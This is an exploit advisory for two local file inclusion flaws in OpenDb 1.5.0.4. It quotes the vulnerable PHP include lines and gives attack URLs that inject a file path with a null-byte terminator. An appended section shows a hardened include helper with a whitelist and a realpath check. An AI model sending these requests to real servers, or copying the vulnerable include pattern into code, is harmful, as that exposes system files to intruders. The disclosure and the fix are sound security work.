# Title : OpenDb 1.5.0.4 Multiple LFI Vulnerability
# Published : 2010-01-23
# Author : ViRuSMaN
==============================================================================
[?] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
[?] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================
[?] Script: [ OpenDb ]
[?] Language: [ PHP ]
[?] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
[?] Download: [ http://sourceforge.net/projects/opendb/files/ ]
[?] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[?] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[?] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
#~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php]
#~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");
[?] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]
===[ Exploit 2 ]===
#~ [C:\AppServ\www\Scripts\opendb\functions\site_plugin.php]
#~Line 126 : include_once("./site/".$site_plugin_classname.".class.php");
[?] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]
Author: ViRuSMaN <-
###########################################################################
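
Both quoted lines build an include path directly from a request-controlled variable. A hardened form of those two includes follows as an added example, not part of the original advisory or of OpenDb's code; `safe_include_path()`, the temporary directory layout and the sample names are assumptions made for illustration:

```php
<?php
// Added example; safe_include_path() is a hypothetical helper, not OpenDb code.
// Maps an untrusted name to a file under $baseDir, or returns null.
function safe_include_path(string $baseDir, string $name, string $suffix): ?string
{
    // Plain identifiers only: '/', '\', '.', and NUL bytes cannot pass.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and returns false for missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . $suffix);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || !is_file($path)
        || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed fixture: a throwaway tree mirroring the two include sites.
$root = sys_get_temp_dir() . '/opendb_demo_' . getmypid();
mkdir("$root/theme/default", 0700, true);
mkdir("$root/site", 0700, true);
file_put_contents("$root/theme/default/theme.php", "<?php // theme stub\n");
file_put_contents("$root/site/amazon.class.php", "<?php // plugin stub\n");

// Constructed inputs: one valid name, then names the check must refuse.
$inputs = ['default', '../site/amazon', "default\0", 'no_such_theme', ''];
foreach ($inputs as $in) {
    $p = safe_include_path("$root/theme", $in, '/theme.php');
    printf("%-18s => %s\n", json_encode($in), $p === null ? 'rejected' : 'include');
}

// Replacement for include_once("./site/".$site_plugin_classname.".class.php"):
$plugin = safe_include_path("$root/site", 'amazon', '.class.php');
if ($plugin !== null) {
    include_once $plugin;
}
```

The `\A...\z` anchors matter: `$` would accept a trailing newline. The `realpath()` prefix comparison catches symlinks that point outside the base directory even when the name itself is a clean identifier.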